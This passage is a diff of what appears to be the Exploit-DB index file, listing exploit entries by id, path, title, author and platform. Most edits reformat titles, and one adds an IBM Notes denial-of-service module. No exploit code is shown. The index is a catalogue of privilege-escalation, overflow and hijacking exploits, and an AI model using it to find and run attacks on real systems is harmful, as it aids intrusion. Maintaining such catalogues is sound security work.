38177,platforms/windows/dos/38177.txt,"IKEView.exe R60 - Stack Buffer Overflow",2015-09-14,hyp3rlinx,windows,dos,0 -38205,platforms/multiple/dos/38205.py,"BT Home Hub - 'uuid' field Buffer Overflow",2013-01-08,"Zachary Cutlip",multiple,dos,0 +38205,platforms/multiple/dos/38205.py,"BT Home Hub - 'uuid' Buffer Overflow",2013-01-08,"Zachary Cutlip",multiple,dos,0 38208,platforms/multiple/dos/38208.py,"Colloquy - Remote Denial of Service",2013-01-09,Aph3x,multiple,dos,0 38214,platforms/windows/dos/38214.txt,"Microsoft Excel 2007/2010/2013 - BIFFRecord Use-After-Free",2015-09-16,"Google Security Research",windows,dos,0 38215,platforms/windows/dos/38215.txt,"Microsoft Office 2007 - BIFFRecord Length Use-After-Free",2015-09-16,"Google Security Research",windows,dos,0 @@ -4773,7 +4773,7 @@ id,file,description,date,author,platform,type,port 38344,platforms/windows/dos/38344.txt,"Adobe Acrobat Reader - AFParseDate JavaScript API Restrictions Bypass",2015-09-28,"Reigning Shells",windows,dos,0 38348,platforms/windows/dos/38348.txt,"Adobe Flash - 'uint' Capacity Field",2015-09-28,"Google Security Research",windows,dos,0 38364,platforms/multiple/dos/38364.txt,"Varnish Cache - Multiple Denial of Service Vulnerabilities",2013-03-05,tytusromekiatomek,multiple,dos,0 -38365,platforms/linux/dos/38365.txt,"Squid - 'httpMakeVaryMark()' Function Remote Denial of Service",2013-03-05,tytusromekiatomek,linux,dos,0 +38365,platforms/linux/dos/38365.txt,"Squid - 'httpMakeVaryMark()' Remote Denial of Service",2013-03-05,tytusromekiatomek,linux,dos,0 38392,platforms/linux/dos/38392.txt,"MySQL / MariaDB - Geometry Query Denial of Service",2013-03-07,"Alyssa Milburn",linux,dos,0 38399,platforms/windows/dos/38399.py,"LanSpy 2.0.0.155 - Buffer Overflow",2015-10-05,hyp3rlinx,windows,dos,0 38404,platforms/windows/dos/38404.py,"LanWhoIs.exe 1.0.1.120 - Stack Buffer Overflow",2015-10-06,hyp3rlinx,windows,dos,0 @@ -4809,7 +4809,7 @@ id,file,description,date,author,platform,type,port 38615,platforms/windows/dos/38615.txt,"Python 2.7 hotshot Module - pack_string Heap Buffer Overflow",2015-11-03,"John Leitch",windows,dos,0 38616,platforms/multiple/dos/38616.txt,"Python 2.7 array.fromstring Method - Use-After-Free",2015-11-03,"John Leitch",multiple,dos,0 38617,platforms/windows/dos/38617.txt,"Python 2.7 - 'strop.replace()' Method Integer Overflow",2015-11-03,"John Leitch",windows,dos,0 -38618,platforms/windows/dos/38618.txt,"Python 3.3 < 3.5 - 'product_setstate()' Function Out-of-Bounds Read",2015-11-03,"John Leitch",windows,dos,0 +38618,platforms/windows/dos/38618.txt,"Python 3.3 < 3.5 - 'product_setstate()' Out-of-Bounds Read",2015-11-03,"John Leitch",windows,dos,0 38620,platforms/linux/dos/38620.txt,"FreeType 2.6.1 - TrueType tt_cmap14_validate Parsing Heap Based Out-of-Bounds Reads",2015-11-04,"Google Security Research",linux,dos,0 38622,platforms/linux/dos/38622.txt,"libvirt - 'virConnectListAllInterfaces' Method Denial of Service",2013-07-01,"Daniel P. Berrange",linux,dos,0 38623,platforms/multiple/dos/38623.html,"RealNetworks RealPlayer - Denial of Service",2013-07-02,"Akshaysinh Vaghela",multiple,dos,0 @@ -4845,7 +4845,7 @@ id,file,description,date,author,platform,type,port 38788,platforms/windows/dos/38788.txt,"Oracle Outside In PDF 8.5.2 - Parsing Memory Corruption (1)",2015-11-23,"Francis Provencher",windows,dos,0 38789,platforms/windows/dos/38789.txt,"Oracle Outside In PDF 8.5.2 - Parsing Memory Corruption (2)",2015-11-23,"Francis Provencher",windows,dos,0 38791,platforms/windows/dos/38791.rb,"Audacious 3.7 - ID3 Local Crash (PoC)",2015-11-23,"Antonio Z.",windows,dos,0 -38793,platforms/windows/dos/38793.txt,"Microsoft Windows - 'ndis.sys' IOCTL 0x170034 (ndis!ndisNsiGetIfNameForIfIndex) - Pool Buffer Overflow (MS15-117)",2015-11-23,"Nils Sommer",windows,dos,0 +38793,platforms/windows/dos/38793.txt,"Microsoft Windows - 'ndis.sys' IOCTL 0x170034 (ndis!ndisNsiGetIfNameForIfIndex) Pool Buffer Overflow (MS15-117)",2015-11-23,"Nils Sommer",windows,dos,0 38794,platforms/windows/dos/38794.txt,"Microsoft Windows - Cursor Object Memory Leak (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 38795,platforms/windows/dos/38795.txt,"Microsoft Windows - Race Condition DestroySMWP Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 38796,platforms/windows/dos/38796.txt,"Microsoft Windows Kernel - Device Contexts and NtGdiSelectBitmap Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 @@ -5464,7 +5464,7 @@ id,file,description,date,author,platform,type,port 41767,platforms/linux/dos/41767.txt,"Linux Kernel (Ubuntu 11.10/12.04) - binfmt_script Stack Data Disclosure",2014-01-14,halfdog,linux,dos,0 41768,platforms/linux/dos/41768.txt,"Apache 2.2 - Scoreboard Invalid Free On Shutdown",2012-01-11,halfdog,linux,dos,0 41769,platforms/linux/dos/41769.txt,"Apache < 2.0.64 / < 2.2.21 mod_setenvif - Integer Overflow",2011-11-02,halfdog,linux,dos,0 -41806,platforms/hardware/dos/41806.txt,"Broadcom Wi-Fi SoC - Heap Overflow in _wlc_tdls_cal_mic_chk_ Due to Large RSN IE in TDLS Setup Confirm Frame",2017-04-04,"Google Security Research",hardware,dos,0 +41806,platforms/hardware/dos/41806.txt,"Broadcom Wi-Fi SoC - Heap Overflow 'wlc_tdls_cal_mic_chk' Due to Large RSN IE in TDLS Setup Confirm Frame",2017-04-04,"Google Security Research",hardware,dos,0 41807,platforms/multiple/dos/41807.html,"Apple WebKit 10.0.2 - HTMLInputElement Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0 41809,platforms/multiple/dos/41809.html,"Apple WebKit - 'RenderLayer' Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0 41810,platforms/multiple/dos/41810.html,"Apple WebKit - Negative-Size memmove in HTMLFormElement",2017-04-04,"Google Security Research",multiple,dos,0 @@ -5679,7 +5679,7 @@ id,file,description,date,author,platform,type,port 42741,platforms/windows/dos/42741.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiGetGlyphOutline' Pool Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0 42742,platforms/windows/dos/42742.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiGetPhysicalMonitorDescription' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0 42743,platforms/windows/dos/42743.cpp,"Microsoft Windows Kernel - 'nt!NtSetIoCompletion / nt!NtRemoveIoCompletion' Pool Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0 -42744,platforms/windows/dos/42744.txt,"Microsoft Windows Kernel - win32k.sys .TTF Font Processing - Out-of-Bounds Reads/Writes with Malformed 'fpgm' table (win32k!bGeneratePath)",2017-09-18,"Google Security Research",windows,dos,0 +42744,platforms/windows/dos/42744.txt,"Microsoft Windows Kernel - win32k.sys '.TTF' Font Processing Out-of-Bounds Reads/Writes with Malformed 'fpgm' table (win32k!bGeneratePath)",2017-09-18,"Google Security Research",windows,dos,0 42746,platforms/windows/dos/42746.txt,"Microsoft Windows Kernel - win32k.sys .TTF Font Processing Out-of-Bounds Read with Malformed 'glyf' Table (win32k!fsc_CalcGrayRow)",2017-09-18,"Google Security Research",windows,dos,0 42748,platforms/windows/dos/42748.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiEngCreatePalette' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0 42749,platforms/windows/dos/42749.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiDoBanding' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0 @@ -5704,6 +5704,7 @@ id,file,description,date,author,platform,type,port 42946,platforms/multiple/dos/42946.py,"Dnsmasq < 2.78 - Integer Underflow",2017-10-02,"Google Security Research",multiple,dos,0 42955,platforms/multiple/dos/42955.html,"WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization (2)",2017-10-04,"Google Security Research",multiple,dos,0 42962,platforms/windows/dos/42962.py,"PyroBatchFTP 3.17 - Buffer Overflow (SEH)",2017-10-07,"Kevin McGuigan",windows,dos,0 +42969,platforms/multiple/dos/42969.rb,"IBM Notes 8.5.x/9.0.x - Denial of Service (Metasploit)",2017-08-31,"Dhiraj Mishra",multiple,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -5821,7 +5822,7 @@ id,file,description,date,author,platform,type,port 381,platforms/windows/local/381.c,"RhinoSoft Serv-U FTP Server 3.x < 5.x - Privilege Escalation",2004-08-08,"Andrés Acunha",windows,local,0 388,platforms/windows/local/388.c,"OllyDbg 1.10 - Format String",2004-08-10,"Ahmet Cihan",windows,local,0 393,platforms/linux/local/393.c,"LibPNG 1.2.5 - 'png_jmpbuf()' Local Buffer Overflow",2004-08-13,anonymous,linux,local,0 -394,platforms/linux/local/394.c,"ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Exploit",2004-08-13,pi3,linux,local,0 +394,platforms/linux/local/394.c,"ProFTPd - 'ftpdctl pr_ctrls_connect' Exploit",2004-08-13,pi3,linux,local,0 395,platforms/windows/local/395.c,"AOL Instant Messenger AIM - 'Away' Message Local Exploit",2004-08-14,mandragore,windows,local,0 396,platforms/bsd/local/396.c,"OpenBSD ftp - Exploit",2002-01-01,Teso,bsd,local,0 401,platforms/windows/local/401.c,"IPSwitch IMail Server 8.1 - Local Password Decryption Utility",2004-08-18,Adik,windows,local,0 @@ -5829,7 +5830,7 @@ id,file,description,date,author,platform,type,port 411,platforms/linux/local/411.c,"Sendmail 8.11.x (Linux/i386) - Exploit",2001-01-01,sd,linux,local,0 417,platforms/linux/local/417.c,"SquirrelMail - 'chpasswd' Local Privilege Escalation (Brute Force)",2004-08-25,Bytes,linux,local,0 434,platforms/linux/local/434.sh,"CDRDAO - Privilege Escalation",2004-09-07,"Karol Wiêsek",linux,local,0 -438,platforms/linux/local/438.c,"CDRecord's ReadCD - '$RSH' 'exec()' SUID Shell Creation",2004-09-11,I)ruid,linux,local,0 +438,platforms/linux/local/438.c,"CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation",2004-09-11,I)ruid,linux,local,0 466,platforms/linux/local/466.pl,"htpasswd Apache 1.3.31 - Local Exploit",2004-09-16,"Luiz Fernando Camargo",linux,local,0 469,platforms/linux/local/469.c,"CDRecord's ReadCD - Privilege Escalation",2004-09-19,"Max Vozeler",linux,local,0 470,platforms/linux/local/470.c,"SudoEdit 1.6.8 - Local Change Permission Exploit",2004-09-21,"Angelo Rosiello",linux,local,0 @@ -5999,7 +6000,7 @@ id,file,description,date,author,platform,type,port 40340,platforms/windows/local/40340.txt,"WIN-911 7.17.00 - Multiple Vulnerabilities",2016-09-06,sh4d0wman,windows,local,0 1554,platforms/multiple/local/1554.c,"LibTiff 3.7.1 - (BitsPerSample Tag) Local Buffer Overflow",2006-03-05,"Agustin Gianni",multiple,local,0 1555,platforms/windows/local/1555.c,"Microsoft Visual Studio 6.0 sp6 - '.dbp' Buffer Overflow",2006-03-05,Kozan,windows,local,0 -1577,platforms/irix/local/1577.sh,"SGI IRIX 6.5.28 - (runpriv) Design Error",2005-10-10,anonymous,irix,local,0 +1577,platforms/irix/local/1577.sh,"SGI IRIX 6.5.28 - 'runpriv' Design Error",2005-10-10,anonymous,irix,local,0 1579,platforms/linux/local/1579.pl,"Ubuntu 5.10 Installer - Password Disclosure",2006-03-12,"Kristian Hermansen",linux,local,0 1584,platforms/windows/local/1584.cpp,"Microsoft Windows - Telephony Service Command Execution (MS05-040)",2006-03-14,"Cesar Cerrudo",windows,local,0 1591,platforms/linux/local/1591.py,"Python 2.4.2 - 'realpath()' Local Stack Overflow",2006-03-18,"Gotfault Security",linux,local,0 @@ -6119,7 +6120,7 @@ id,file,description,date,author,platform,type,port 3414,platforms/multiple/local/3414.php,"PHP < 4.4.5/5.2.1 - WDDX Session Deserialization Information Leak",2007-03-04,"Stefan Esser",multiple,local,0 3417,platforms/windows/local/3417.php,"PHP 4.4.6 - 'mssql_[p]connect()' Local Buffer Overflow",2007-03-05,rgod,windows,local,0 3424,platforms/multiple/local/3424.php,"PHP 5.2.1 - 'substr_compare()' Information Leak Exploit",2007-03-07,"Stefan Esser",multiple,local,0 -3426,platforms/linux/local/3426.php,"PHP < 4.4.5/5.2.1 - 'shmop' Functions Local Code Execution",2007-03-07,"Stefan Esser",linux,local,0 +3426,platforms/linux/local/3426.php,"PHP < 4.4.5/5.2.1 - 'shmop' Local Code Execution",2007-03-07,"Stefan Esser",linux,local,0 3427,platforms/linux/local/3427.php,"PHP < 4.4.5/5.2.1 - 'shmop' SSL RSA Private-Key Disclosure",2007-03-07,"Stefan Esser",linux,local,0 3429,platforms/windows/local/3429.php,"PHP 'COM' Extensions - (inconsistent Win32) 'safe_mode' Bypass Exploit",2007-03-07,anonymous,windows,local,0 3431,platforms/windows/local/3431.php,"PHP 4.4.6 - 'crack_opendict()' Local Buffer Overflow (PoC)",2007-03-08,rgod,windows,local,0 @@ -6136,7 +6137,7 @@ id,file,description,date,author,platform,type,port 3525,platforms/linux/local/3525.php,"PHP 4.4.6/5.2.1 - ext/gd Already Freed Resources Usage Exploit",2007-03-20,"Stefan Esser",linux,local,0 3529,platforms/linux/local/3529.php,"PHP 5.2.1 - 'hash_update_file()' Freed Resource Usage Exploit",2007-03-20,"Stefan Esser",linux,local,0 3559,platforms/multiple/local/3559.php,"PHP 5.2.1 - 'Unserialize()' Local Information Leak Exploit",2007-03-23,"Stefan Esser",multiple,local,0 -3571,platforms/linux/local/3571.php,"PHP < 4.4.5/5.2.1 - '_SESSION' 'unset()' Local Exploit",2007-03-25,"Stefan Esser",linux,local,0 +3571,platforms/linux/local/3571.php,"PHP < 4.4.5/5.2.1 - '_SESSION unset()' Local Exploit",2007-03-25,"Stefan Esser",linux,local,0 3572,platforms/linux/local/3572.php,"PHP < 4.4.5/5.2.1 - '_SESSION' Deserialization Overwrite",2007-03-25,"Stefan Esser",linux,local,0 3576,platforms/windows/local/3576.php,"PHP 5.2.1 with PECL PHPDOC - Local Buffer Overflow",2007-03-25,rgod,windows,local,0 3578,platforms/bsd/local/3578.c,"FreeBSD mcweject 0.9 (eject) - Buffer Overflow Privilege Escalation",2007-03-26,harry,bsd,local,0 @@ -6593,8 +6594,8 @@ id,file,description,date,author,platform,type,port 9831,platforms/windows/local/9831.txt,"Avast! AntiVirus 4.8.1351.0 - Denial of Service / Privilege Escalation",2009-09-23,Evilcry,windows,local,0 9842,platforms/php/local/9842.txt,"PHP 5.3.0 - pdflib Arbitrary File Write",2009-11-06,"Sina Yazdanmehr",php,local,0 9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc5 - 'pipe.c' Privilege Escalation (3)",2009-11-05,"Matthew Bergin",linux,local,0 -9859,platforms/freebsd/local/9859.c,"FreeBSD 6.4 - pipeclose()/knlist_cleardel() Race Condition",2009-10-08,"Przemyslaw Frasunek",freebsd,local,0 -9860,platforms/freebsd/local/9860.c,"FreeBSD 7.2 VFS/devfs - Race Condition",2009-10-08,"Przemyslaw Frasunek",freebsd,local,0 +9859,platforms/freebsd/local/9859.c,"FreeBSD 6.4 - 'pipeclose()'/'knlist_cleardel()' Race Condition",2009-10-08,"Przemyslaw Frasunek",freebsd,local,0 +9860,platforms/freebsd/local/9860.c,"FreeBSD 7.2 - VFS/devfs Race Condition",2009-10-08,"Przemyslaw Frasunek",freebsd,local,0 9865,platforms/windows/local/9865.py,"Adobe Acrobat Reader 7 < 9 - U3D Buffer Overflow",2009-10-27,"Felipe Andres Manzano",windows,local,0 9866,platforms/windows/local/9866.txt,"Alleycode HTML Editor 2.2.1 - Buffer Overflow",2009-10-29,Dr_IDE,windows,local,0 9882,platforms/windows/local/9882.txt,"Mozilla Firefox 3.5.3 - Local Download Manager Temp File Creation",2009-10-28,"Jeremy Brown",windows,local,0 @@ -6881,7 +6882,7 @@ id,file,description,date,author,platform,type,port 14730,platforms/windows/local/14730.c,"Mozilla Firefox 3.6.8 - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Glafkos Charalambous",windows,local,0 14731,platforms/windows/local/14731.c,"Microsoft Windows Movie Maker 2.6.4038.0 - 'hhctrl.ocx' DLL Hijacking",2010-08-24,TheLeader,windows,local,0 14732,platforms/windows/local/14732.c,"Opera 10.61 - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Nicolas Krassas",windows,local,0 -14733,platforms/windows/local/14733.c,"Microsoft Windows 7 - 'wab32res.dll' 'wab.exe' DLL Hijacking",2010-08-24,TheLeader,windows,local,0 +14733,platforms/windows/local/14733.c,"Microsoft Windows 7 - 'wab32res.dll wab.exe' DLL Hijacking",2010-08-24,TheLeader,windows,local,0 14734,platforms/windows/local/14734.c,"TeamViewer 5.0.8703 - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Glafkos Charalambous",windows,local,0 14735,platforms/windows/local/14735.c,"Adobe Dreamweaver CS4 - 'ibfs32.dll' DLL Hijacking",2010-08-24,"Glafkos Charalambous",windows,local,0 14744,platforms/windows/local/14744.c,"Microsoft Visio 2003 - 'mfc71enu.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0 @@ -7045,7 +7046,7 @@ id,file,description,date,author,platform,type,port 16141,platforms/windows/local/16141.py,"xRadio 0.95b - '.xrl' Local Buffer Overflow (SEH)",2011-02-09,b0telh0,windows,local,0 16153,platforms/windows/local/16153.py,"MoviePlay 4.82 - '.lst' Buffer Overflow",2011-02-11,sickness,windows,local,0 16162,platforms/windows/local/16162.pl,"CuteZip 2.1 - Buffer Overflow",2011-02-12,"C4SS!0 G0M3S",windows,local,0 -16169,platforms/windows/local/16169.py,"Oracle 10/11g - 'exp.exe' 'file' Parameter Local Buffer Overflow (PoC)",2011-02-15,mr_me,windows,local,0 +16169,platforms/windows/local/16169.py,"Oracle 10/11g - 'exp.exe file' Parameter Local Buffer Overflow (PoC)",2011-02-15,mr_me,windows,local,0 16173,platforms/windows/local/16173.py,"AutoPlay 1.33 (autoplay.ini) - Local Buffer Overflow (SEH)",2011-02-15,badc0re,windows,local,0 16253,platforms/windows/local/16253.py,"Elecard AVC_HD/MPEG Player 5.7 - Buffer Overflow",2011-02-27,sickness,windows,local,0 16307,platforms/multiple/local/16307.rb,"PeaZIP 2.6.1 - Zip Processing Command Injection (Metasploit)",2010-09-20,Metasploit,multiple,local,0 @@ -7173,7 +7174,7 @@ id,file,description,date,author,platform,type,port 17391,platforms/linux/local/17391.c,"Linux Kernel 2.6.28/3.0 (DEC Alpha Linux) - Privilege Escalation",2011-06-11,"Dan Rosenberg",linux,local,0 17441,platforms/windows/local/17441.py,"FreeAmp 2.0.7 - '.fat' Buffer Overflow",2011-06-23,"Iván García Ferreira",windows,local,0 17449,platforms/windows/local/17449.py,"FreeAmp 2.0.7 - '.pls' Buffer Overflow",2011-06-24,"C4SS!0 G0M3S",windows,local,0 -17451,platforms/windows/local/17451.rb,"Microsoft Visio - 'VISIODWG.dll' '.DXF' File Handling (MS10-028) (Metasploit)",2011-06-26,Metasploit,windows,local,0 +17451,platforms/windows/local/17451.rb,"Microsoft Visio - 'VISIODWG.dll .DXF' File Handling (MS10-028) (Metasploit)",2011-06-26,Metasploit,windows,local,0 17459,platforms/windows/local/17459.txt,"Valve Steam Client Application 1559/1559 - Privilege Escalation",2011-06-29,LiquidWorm,windows,local,0 17473,platforms/windows/local/17473.txt,"Adobe Reader X 10.0.0 < 10.0.1 - Atom Type Confusion Exploit",2011-07-03,Snake,windows,local,0 17474,platforms/windows/local/17474.txt,"Microsoft Office 2010 - '.RTF' Header Stack Overflow",2011-07-03,Snake,windows,local,0 @@ -7225,7 +7226,7 @@ id,file,description,date,author,platform,type,port 17932,platforms/linux/local/17932.c,"PolicyKit polkit-1 < 0.101 - Privilege Escalation",2011-10-05,zx2c4,linux,local,0 17939,platforms/windows/local/17939.py,"BlazeVideo HDTV Player 6.6 Professional - Universal ASLR + DEP Bypass",2011-10-07,modpr0be,windows,local,0 17942,platforms/linux/local/17942.c,"pkexec - Race Condition Privilege Escalation",2011-10-08,xi4oyu,linux,local,0 -17966,platforms/windows/local/17966.rb,"ACDSee FotoSlate - '.PLP' File id Parameter Overflow (Metasploit)",2011-10-10,Metasploit,windows,local,0 +17966,platforms/windows/local/17966.rb,"ACDSee FotoSlate - '.PLP' File 'id' Parameter Overflow (Metasploit)",2011-10-10,Metasploit,windows,local,0 17967,platforms/windows/local/17967.rb,"TugZip 3.5 Archiver - '.ZIP' File Parsing Buffer Overflow (Metasploit)",2011-10-11,Metasploit,windows,local,0 17985,platforms/windows/local/17985.rb,"Real Networks Netzip Classic 7.5.1 86 - File Parsing Buffer Overflow (Metasploit)",2011-10-16,Metasploit,windows,local,0 18040,platforms/linux/local/18040.c,"Xorg 1.4 < 1.11.2 - File Permission Change (PoC)",2011-10-28,vladz,linux,local,0 @@ -7696,7 +7697,7 @@ id,file,description,date,author,platform,type,port 20263,platforms/irix/local/20263.txt,"IRIX 5.2/6.0 - Permissions File Manipulation",1995-03-02,"Larry Glaze",irix,local,0 20265,platforms/windows/local/20265.txt,"Microsoft Windows NT 4.0/2000 - Spoofed LPC Request (MS00-003)",2000-10-03,"BindView's Razor Team",windows,local,0 20274,platforms/multiple/local/20274.pl,"IBM Websphere 2.0/3.0 - ikeyman Weak Encrypted Password",1999-10-24,"Ben Laurie",multiple,local,0 -20275,platforms/solaris/local/20275.sh,"Netscape iCal 2.1 Patch2 iPlanet iCal - 'iplncal.sh' Permissions",2000-10-10,@stake,solaris,local,0 +20275,platforms/solaris/local/20275.sh,"Netscape iCal 2.1 Patch2 - iPlanet iCal 'iplncal.sh' Permissions",2000-10-10,@stake,solaris,local,0 20276,platforms/solaris/local/20276.sh,"Netscape iCal 2.1 Patch2 - iPlanet iCal 'csstart'",2000-10-10,@stake,solaris,local,0 20285,platforms/linux/local/20285.c,"RedHat 6.2/7.0 Tmpwatch - Arbitrary Command Execution",2000-10-06,X-Force,linux,local,0 20290,platforms/aix/local/20290.txt,"AIX 3.x - bugfiler Arbitrary File Creation",1997-09-08,"Johannes Schwabe",aix,local,0 @@ -8002,7 +8003,7 @@ id,file,description,date,author,platform,type,port 21815,platforms/osx/local/21815.txt,"Apple Mac OSX 10.2 - Terminal.APP Telnet Link Command Execution",2002-09-21,"Taiyo Fujii",osx,local,0 21884,platforms/unix/local/21884.txt,"Sendmail 8.12.x - SMRSH Double Pipe Access Validation",2002-10-01,zen-parse,unix,local,0 21881,platforms/bsd/local/21881.txt,"Rogue 5.3 - Local Buffer Overflow",2002-09-30,stanojr@iserver.sk,bsd,local,0 -21831,platforms/windows/local/21831.c,"PLIB 1.8.5 - ssg/ssgParser.cxx Buffer Overflow",2012-10-09,"Andrés Gómez",windows,local,0 +21831,platforms/windows/local/21831.c,"PLIB 1.8.5 - 'ssg/ssgParser.cxx' Buffer Overflow",2012-10-09,"Andrés Gómez",windows,local,0 21843,platforms/windows/local/21843.rb,"Microsoft Windows - Escalate UAC Execute RunAs (Metasploit)",2012-10-10,Metasploit,windows,local,0 21844,platforms/windows/local/21844.rb,"Microsoft Windows - 'AfdJoinLeaf' Privilege Escalation (MS11-080) (Metasploit)",2012-10-10,Metasploit,windows,local,0 21845,platforms/windows/local/21845.rb,"Microsoft Windows - Escalate UAC Protection Bypass (Metasploit)",2012-10-10,Metasploit,windows,local,0 @@ -8106,7 +8107,7 @@ id,file,description,date,author,platform,type,port 22773,platforms/linux/local/22773.c,"Progress Database 9.1 - Environment Variable Privilege Escalation",2003-06-14,kf,linux,local,0 22775,platforms/linux/local/22775.txt,"FreeWnn 1.1.1 - JServer Logging Option Data Corruption",2003-06-14,"Stefano Di Paola",linux,local,0 22779,platforms/windows/local/22779.pl,"Mailtraq 2.1.0.1302 - User Password Encoding",2003-06-16,"Noam Rathaus",windows,local,0 -22781,platforms/linux/local/22781.txt,"Linux PAM 0.77 - Pam_Wheel Module 'getlogin()' 'Username' Spoofing Privilege Escalation",2003-06-16,"Karol Wiesek",linux,local,0 +22781,platforms/linux/local/22781.txt,"Linux PAM 0.77 - Pam_Wheel Module 'getlogin() Username' Spoofing Privilege Escalation",2003-06-16,"Karol Wiesek",linux,local,0 22806,platforms/linux/local/22806.sh,"SDFingerD 1.1 - Failure To Drop Privileges Privilege Escalation",2003-06-19,V9,linux,local,0 22811,platforms/bsd/local/22811.c,"Abuse-SDL 0.7 - Command-Line Argument Buffer Overflow",2003-06-19,Matrix_DK,bsd,local,0 22813,platforms/linux/local/22813.c,"Linux Kernel 2.2.x/2.4.x - '/proc' Filesystem Information Disclosure",2003-06-20,IhaQueR,linux,local,0 @@ -8170,7 +8171,7 @@ id,file,description,date,author,platform,type,port 23223,platforms/linux/local/23223.c,"SuSE Linux Professional 8.2 - SuSEWM Configuration File Insecure Temporary File",2003-10-06,"Nash Leon",linux,local,0 23228,platforms/linux/local/23228.c,"SLocate 2.6 - User-Supplied Database Heap Overflow",2003-10-06,"Patrik Hornik",linux,local,0 23251,platforms/linux/local/23251.txt,"Centrify Deployment Manager 2.1.0.283 - Privilege Escalation",2012-12-09,"Larry W. Cashdollar",linux,local,0 -23255,platforms/windows/local/23255.cpp,"Microsoft ListBox/ComboBox Control - 'User32.dll' Function Buffer Overrun",2003-10-15,"Brett Moore",windows,local,0 +23255,platforms/windows/local/23255.cpp,"Microsoft ListBox/ComboBox Control - 'User32.dll' Buffer Overrun",2003-10-15,"Brett Moore",windows,local,0 23258,platforms/linux/local/23258.c,"Oracle Database Server 9.0.x - Oracle Binary Local Buffer Overflow",2003-10-17,c0ntex,linux,local,0 23297,platforms/linux/local/23297.c,"Musicqueue 1.2 - SIGSEGV Signal Handler Insecure File Creation",2003-10-27,"dong-h0un U",linux,local,0 23299,platforms/linux/local/23299.c,"Wireless Tools 26 (IWConfig) - ARGV Local Command Line Buffer Overflow (1)",2003-10-27,axis,linux,local,0 @@ -8382,7 +8383,7 @@ id,file,description,date,author,platform,type,port 27297,platforms/linux/local/27297.c,"Linux Kernel 3.7.6 (RedHat x86/x64) - 'MSR' Driver Privilege Escalation",2013-08-02,spender,linux,local,0 27316,platforms/windows/local/27316.py,"Easy LAN Folder Share 3.2.0.100 - Buffer Overflow (SEH)",2013-08-03,sagi-,windows,local,0 27334,platforms/php/local/27334.txt,"PHP 4.x/5.0/5.1 with Sendmail Mail Function - 'additional_parameters' Argument Arbitrary File Creation",2006-02-28,ced.clerget@free.fr,php,local,0 -27335,platforms/php/local/27335.txt,"PHP 4.x/5.0/5.1 - 'mb_send_mail()' Function Parameter Restriction Bypass",2006-02-28,ced.clerget@free.fr,php,local,0 +27335,platforms/php/local/27335.txt,"PHP 4.x/5.0/5.1 - 'mb_send_mail()' Parameter Restriction Bypass",2006-02-28,ced.clerget@free.fr,php,local,0 40764,platforms/windows/local/40764.cs,"Microsoft Windows - VHDMP ZwDeleteFile Arbitrary File Deletion Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0 40763,platforms/windows/local/40763.cs,"Microsoft Windows - VHDMP Arbitrary File Creation Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0 27461,platforms/linux/local/27461.c,"Linux Kernel 2.4.x/2.5.x/2.6.x - Sockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities",2006-03-23,"Pavel Kankovsky",linux,local,0 @@ -8477,7 +8478,7 @@ id,file,description,date,author,platform,type,port 30280,platforms/linux/local/30280.txt,"GFax 0.7.6 - Temporary Files Local Arbitrary Command Execution",2007-07-05,"Steve Kemp",linux,local,0 30295,platforms/multiple/local/30295.sql,"Oracle Database - SQL Compiler Views Unauthorized Manipulation",2007-07-12,bunker,multiple,local,0 30393,platforms/win_x86-64/local/30393.rb,"Nvidia (nvsvc) Display Driver Service - Privilege Escalation (Metasploit)",2013-12-17,Metasploit,win_x86-64,local,0 -30392,platforms/windows/local/30392.rb,"Microsoft Windows - 'ndproxy.sys' - Privilege Escalation (Metasploit)",2013-12-17,Metasploit,windows,local,0 +30392,platforms/windows/local/30392.rb,"Microsoft Windows - 'ndproxy.sys' Privilege Escalation (Metasploit)",2013-12-17,Metasploit,windows,local,0 30336,platforms/windows/local/30336.py,"VUPlayer 2.49 - '.m3u' File Universal Buffer Overflow (DEP Bypass) (2)",2013-12-16,"Morteza Hashemi",windows,local,0 30802,platforms/windows/local/30802.c,"VMware Tools 3.1 - 'HGFS.Sys' Privilege Escalation",2007-11-24,SoBeIt,windows,local,0 30374,platforms/windows/local/30374.txt,"QuickHeal AntiVirus 7.0.0.1 - Stack Overflow",2013-12-17,"Arash Allebrahim",windows,local,0 @@ -8515,7 +8516,7 @@ id,file,description,date,author,platform,type,port 31574,platforms/arm/local/31574.c,"Linux Kernel < 3.4.5 (Android 4.2.2/4.4 ARM) - Privilege Escalation",2014-02-11,"Piotr Szerman",arm,local,0 31576,platforms/windows/local/31576.rb,"Microsoft Windows - TrackPopupMenuEx Win32k NULL Page (MS13-081) (Metasploit)",2014-02-11,Metasploit,windows,local,0 31643,platforms/windows/local/31643.rb,"Easy CD-DA Recorder - 